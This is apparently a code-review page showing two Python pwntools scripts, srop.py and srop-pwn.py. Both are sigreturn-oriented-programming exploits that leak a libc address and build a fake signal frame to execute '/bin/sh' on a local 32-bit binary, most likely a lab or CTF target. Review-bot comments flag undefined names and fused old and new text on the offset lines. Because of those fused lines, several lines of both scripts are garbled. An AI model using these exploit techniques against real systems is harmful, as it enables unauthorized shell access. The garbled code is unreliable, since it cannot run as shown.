...

title: srop.py
from pwn import *
  
binary = ELF('./sropsrop32')
p = process(binary.path)

p.recvuntil('Printf() address : ')
stackAddr = p.recvuntil('\n')
stackAddr = int(stackAddr,16)
  
libcBase = stackAddr - 0x49020
ksigreturnsyscall = libcBase + 0x1d5de1 0x1d8de6
syscallbinsh = libcBase + 0x1d5de6 0x15902b
binshksigreturn = libcBase + 0x15902b0x1d8de0
 
print 'The base address of Libc    : ' + hex(libcBase)
print hex(sigreturn)
print hex(binsh)
print hex(syscall)
 
exploit = ''
exploit += 'Address of syscall gadget   : ' + hex(syscall)
print 'Address of string "/bin/sh" : ' + hex(binsh)
print 'Address of sigreturn()      : ' + hex(ksigreturn)

exploit = ''
exploit += "\x90" * 66
exploit += p32(ksigreturn)
exploit += p32(0x0)
 
exploit += p32(0x0)			         #GS
exploit += p32(0x0)			         #FS
exploit += p32(0x0)			         #ES
exploit += p32(0x0)			#DS	         #DS
exploit += p32(0x0)			#EDI
exploit += p32(0x0)			         #EDI
exploit += p32(0x0)         #ESI
exploit += p32(0x0)			         #EBP
exploit += p32(syscall)		     #ESP
exploit += p32(binsh)		#EBX        #EBX
exploit += p32(0x0)			         #EDX
exploit += p32(0x0)			         #ECX
exploit += p32(0xb)			 += p32(0xb)         #EAX
exploit += p32(0x0)			         #trapno
exploit += p32(0x0)			         #err
 
exploit += p32(syscall)		     #EIP
exploit += p32(0x23)		        #CS
exploit += p32(0x0)			#eflags
exploit += p32(0x0)			         #eflags
exploit += p32(0x0)         #esp_atsignal
exploit += p32(0x2b)		        #SS
 
p.send(exploit)
p.interactive()
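Review bot: `print hex(sigreturn)` reads a name the script never assigns — the sigreturn gadget is stored in `ksigreturn` a few lines above — so this version raises NameError at that print before anything is sent; change it to `print hex(ksigreturn)` or drop the line, since the labelled `print 'Address of sigreturn() ...'` further down already reports that value. The same undefined name appears in srop-pwn.py below. The version rendering has fused old and new text on the gadget-offset lines (`ksigreturnsyscall = libcBase + 0x1d5de1 0x1d8de6`) and on several register comments, so which offsets and which frame comments the new side keeps cannot be read from this page with certainty. The libc offsets (`0x49020`, `0x1d5de1`, `0x15902b`) are valid for one libc build only; a comment above `libcBase = ...` naming the build they were taken from would let a reader reproduce the script.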

...

title: srop-pwn.py
from pwn import *
 
binary = ELF('./sropsrop32')
p = process(binary.path)

p.recvuntil('Printf() address : ')
stackAddr = p.recvuntil('\n')
stackAddr = int(stackAddr,16)
  
libcBase = stackAddr - 0x49020
syscall = libcBase + 0x1d8de6
binsh = libcBase + 0x15902b
ksigreturn = libcBase + 0x1d5de1 
syscall = libcBase + 0x1d5de6 
binsh = libcBase + 0x15902b
 
print hex(libcBase)
print hex(sigreturn)
print hex(binsh)
print hex(syscall 0x1d8de0

print 'The base address of Libc    : ' + hex(libcBase)
print 'Address of syscall gadget   : ' + hex(syscall)
print 'Address of string "/bin/sh" : ' + hex(binsh)
print 'Address of sigreturn()      : ' + hex(ksigreturn)
 
exploit = ''
exploit += "\x90" * 66
exploit += p32(ksigreturn) 	#ret
exploit += p32(0x0)

frame = SigreturnFrame(kernel='amd64')
frame.eax = constants.SYS_execve
frame.ebx = binsh
frame.esp = syscall 
frame.eip = syscall
 
exploit += str(frame)

p.send(exploit)
p.interactive()
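Review bot: `SigreturnFrame(kernel='amd64')` is built without pinning the architecture: nothing visible assigns `context.arch` or `context.binary`, so the frame layout depends on pwntools' default context rather than on the 32-bit target that the `eax`/`ebx`/`esp`/`eip` fields assume; `context.binary = binary` directly after the `ELF(...)` line ties arch and bits to the loaded binary. `print hex(sigreturn)` still refers to an undefined name here (the variable is `ksigreturn`), which would raise NameError before the frame is sent. As rendered, `syscall` is assigned twice with different offsets and `print hex(syscall 0x1d8de0` is a fused line, so the offset the new side actually uses cannot be confirmed from this page.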

...